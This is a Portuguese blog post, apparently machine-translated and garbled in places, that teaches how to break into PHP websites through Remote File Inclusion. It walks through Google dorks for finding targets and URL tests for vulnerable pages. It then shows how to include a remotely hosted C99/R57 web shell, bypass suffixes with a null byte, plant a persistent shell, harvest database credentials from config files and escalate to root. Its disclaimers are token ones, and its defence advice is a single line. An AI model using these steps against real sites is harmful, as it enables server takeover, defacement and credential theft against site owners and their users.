Como hackear sites pelo Remote File Inclusion

Postado em 07:21 by Administrador

ImageShack, share photos, pictures, free image hosting, free video hosting, image hosting, video hosting, photo image hosting site, video hosting site
Informações Hack
Nossa Opinião

Nota: Website hacking é ilegal, este artigo é apenas para fins educacionais.
O que é a inclusão de arquivos remotos?
Remote File Inclusion é um método de "hacking" websites e obter os direitos de administrador do servidor através da inserção de um arquivo remoto chamado geralmente como a Shell (a concha é arquivo de interface gráfica do usuário que é usado para visitar os arquivos remotos e executar o seu próprio código na web servidores) em um site, cuja inclusão permite a hackers para executar os comandos do lado do servidor como um usuário conectado no momento, e têm o acesso a todos os arquivos do servidor. Com esses direitos, podemos continuar a usar exploits locais para escalar nossos privilégios e obter controle sobre todo o servidor.
Nota: Remote File Inclusion (RFI) é a melhor técnica para hack sites e mais de 60% em sites da internet usando PHP estão vulneráveis a este ataque.

Sites que são vulneráveis a ataque de inclusão remota de arquivos?
Primeira e pergunta muito básica surge na mente de hackers novo Como a gente pode encontrar os sites que os seus propensos a ataques remotos arquivo de inclusão. E quais são as vulnerabilidades de base no site que terá como alvo para hack qualquer site e servidor web. Resposta a estas perguntas é bastante simples.
Muitos dos servidores web são vulneráveis a esse tipo de ataque por causa das configurações padrão do PHP register_globals e allow_url_fopen está habilitado.
Nota: No PHP 6.0, register_globals tem sido removido, mas continua a ser a segunda vulnerabilidade continua em aberto, para que possamos experimentá-lo para sites mais recente versão do PHP também. Mas uma boa notícia para os hackers é que cerca de 90% em sites da Internet ainda usa versões antigas do PHP e outra boa notícia nos sites de 90%, mais de 60% de sites tem configurações padrão habilitado. Isso significa que pode hack a maioria dos sites e apagar-los. Isso não é legal, mas como eu tenho dito que nós somos hackers éticos só encontrar vulnerabilidades nos sites.

Agora vamos começar passo a passo método de inclusão de arquivos remotos para invadir sites:
Passo 1: Encontrar a sites vulneráveis
Primeiro de tudo temos de encontrar o site que recebe as suas páginas usando o PHP função include () e vulneráveis a RFI (Remote File Inclusion). A melhor técnica é encontrar sites usando o Google Dorks. Dorks Google são simplesmente as consultas que são usadas para identificar os resultados de pesquisa específico.
Baixe a lista de Dorks para RFI: Download ou
Download

Passo 2: Identificar website Vulneráveis
Sites que possuem o sistema de navegação de página semelhante ao abaixo mencionado:
http://target-site.com/index.php?page=PageName

Passo 3: Verificando Website é vulnerável ou não
Para verificar se um site está vulnerável a ataques remotos arquivo de inclusão, nós vamos tentar incluir um link do site, em vez de PageName conforme demonstrado abaixo:
http://target-site.com/index.php?page=http://google.com
Agora, se o Google Home Page abrir, em seguida, confirmou que seu site é vulnerável a ataque de inclusão remota de arquivos e vamos continuar o nosso ataque. Se a página inicial do Google não abre, vamos tentar outro site.

Passo 4: Inclusão remoto das Shells
Agora sabemos que o site é hackable, por isso vamos agora incluem os reservatórios para o site. Há um número de reservatórios disponível online, mas meus favoritos são C99 e R57 por causa de sua funcionalidade estendida e funcionalidades.
Não há necessidade de fazer download destes reservatórios em seus sistemas ou PC, podemos usar diretamente os recursos online para fazer isso, mas se quiser, você pode baixá-los em seus respectivos sites. Não vou fornecer esses aqui, porque a sua u antiético, mas o Google, e pode encontrá-los facilmente.
Para encontrar a um escudo o hacker teria de pesquisa do Google para:
inurl:c99.txt
Isto irá exibir muitos sites com o reservatório já está instalado e pronto para ser incluído.
Nota: você deve incluir um? depois da URL da Shell, para que se alguma coisa vem depois c99.txt, ele será passado para o shell e não causar quaisquer problemas.

Para uso futuro de análise que você pode baixar esses reservatórios a partir daqui:
http://www.localroot.net/
A nova URL com a casca, ficaria assim:
http://target-site.com/index.php?page=http://site.com/c99.txt?

Passo 5: Adicionando byte nulo
Às vezes, o script PHP no servidor acrescenta ". php" ao final de cada arquivo incluído. Então, se você incluiu o shell, seria acabar parecendo "c99.txt.php" e não de trabalho. Para contornar esse problema, você poderia adicionar um byte nulo () para o final de c99.txt. Isso informa ao servidor a ignorar tudo que vem depois c99.txt.

Passo 6: Banco de Dados Vulnerabilidades
No primeiro passo, eu lhe disse que os hackers usam dorks Google para procurar por sites possivelmente vulneráveis a RFI. Um exemplo de um idiota Google seria:
allinurl:.php?page=
Este olha para URL com. php? page = neles. Este é apenas um exemplo, e você provavelmente não vai encontrar sites vulneráveis com essa pesquisa. Você pode tentar mudar em torno da palavra "página" com outras letras e similares
as palavras.

Hackers geralmente pesquisar bancos de dados como a vulnerabilidade

www.milw0rm.com
para vulnerabilidades já descobertas RFI em sistemas de gestão de conteúdos e site de busca para sites que estejam executando o que a aplicação web vulnerável com um idiota do Google.

Passo 6: Se o ataque bem-sucedido
Se for bem-sucedido em obter o servidor para analisar o escudo, então iremos ver um imagen semelhante a foto seguinte:
A shell irá exibir informações sobre o servidor remoto e listar todos os arquivos e diretórios sobre ele. A partir daqui, iríamos encontrar um diretório que tenha privilégios de leitura e gravação e upload a casca, mas desta vez como um arquivo. php, para que encerre a vulnerabilidade é fixo, ele será capaz de acessá-lo mais tarde.

Passo 7: Encontre os privilégios de root no servidor
Agora, seria o próximo encontrar uma maneira de obter privilégios de root no sistema. Podemos fazer isso fazendo o upload e execução exploits locais contra o servidor. você pode encontrar uma lista de tais façanhas em milw0rm. Nós poderíamos também procurar o servidor vítima de arquivos de configuração. Esses arquivos na maioria das vezes conter nome de usuário e senhas dos bancos de dados MYSQL e tal.

Essa é toda a maneira para hackear sites utilizando o método de inclusão remota de arquivos. Espero que todos tenham gostado. E estou certo de que todos tenham um monte de perguntas a desclassificação isso, então não hesite em perguntar na forma de comentários. Vou tentar esclarecer todas as suas consultas.


Como proteger seus sites e fóruns de Remote ataque de inclusão de arquivo?
Como somos éticos i hackers também iremos explicar para os webmasters a proteger seus sites do ataque RFI.
Para se proteger de ataques de RFI, basta ter certeza que você estiver usando scripts de-to-date, e certifique-se de servidor de arquivo php.ini allow_url_fopen e register_globals tem deficiência.


Nota: Website hacking é ilegal, este artigo é apenas para fins educacionais.

Sem resposta para "Como hackear sites pelo Remote File Inclusion"